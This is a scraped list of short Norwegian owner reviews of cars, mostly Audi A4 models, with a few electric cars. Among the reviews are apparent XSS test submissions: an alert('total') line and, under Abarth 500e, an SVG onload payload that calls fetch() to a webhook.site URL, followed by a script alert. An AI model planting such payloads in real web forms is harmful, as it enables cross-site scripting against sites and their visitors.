Vurdert av HoiGa
Audi A4 (2005)
Dette er en nydelig bil å kjøre, med premiumfølelse i interiøret samt en deilig førerplass. Men plassen er for dårlig for en familie og driftssikkerheten hvertfall på denne var håpløs.
Audi A4 (2005)
Alt for mye reparasjoner/utgifter fra da bilen var 5 år gammel.
Audi A4 (2005)
Brukbar bil lite feil
Audi A4 (2005)
Morsom og kjapp, ligger veldig godt på veien! Bra komfort på seter og innstillinger, litt stiv i fjæring, men det liker jeg. Dårlig løsning på vindusheiser (byttet), og vidusviskere, føler til
Audi A4 (2005)
Kjempegod bil med skikkelig quattro ( permanent firehjulstrekk). Det er helt utrolig for en god framkommelighet bilen har. Haldex kan ikke sammenlignes. Har hatt bilen i snart 3 år og 50 000 km og h
Audi A4 (2005)
Bra motor. Men mye elektronikk problemer. Mye små feil generelt men ingen store kostnader om man skrur selv. Bilen jeg har jo gått over 350 så kan vell ikke forvente annet. Viss man ikke skrur se
Audi A4 (2005)
En i alt bil, en glede å kjøre med sline understell og quattro, interiør og seter er av skyhøy kvalitet. Bankboks interiør som ikke skrammler og knirker høy kvalites følelse.
Audi A4 (2004)
Svært driftsikker bil med suveren fremkommelighet.
Audi A4 (2004)
Bilen er snart 20 år og går som ei klokke. Veldig lite feil. Tar seg frem overalt med Audis utrolige quattro.
Audi A4 (2004)
Lave driftskostnader, går og går men regn med litt småplukk.
Audi A4 (2004)
Kjørt 320 000km byttet olje hver 10 000km og 60000km på girkasse veldig driftsikker. Lite feil Xenon lysene kunne vært bedre, og de er dyre og skifte, virker ut som d1s pærene mister effekt over
Audi A4 (2004)
10/10. Beste bilen en kan kjøpe til under 100.000kr.
Audi A4 (2004)
Totalt sett får bilen 8. Enorm kjøremaskin som sluker mil, fantastisk quattro-system som gir overlegen fremkommelighet og veigrep.
Audi A4 (2004)
God bil med 2,5 V6 diesel, manuell og quattro. Driftssikker og lite forbruk
Audi A4 (2004)
Meget godt fornøyd med bilen, ingen problemer sålangt og lave driftskostnader. Bilen har god komfort, ikke noe sportsbil følelse, men meget behagelig. ikke all verden med plass i baksetet, og kunne
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat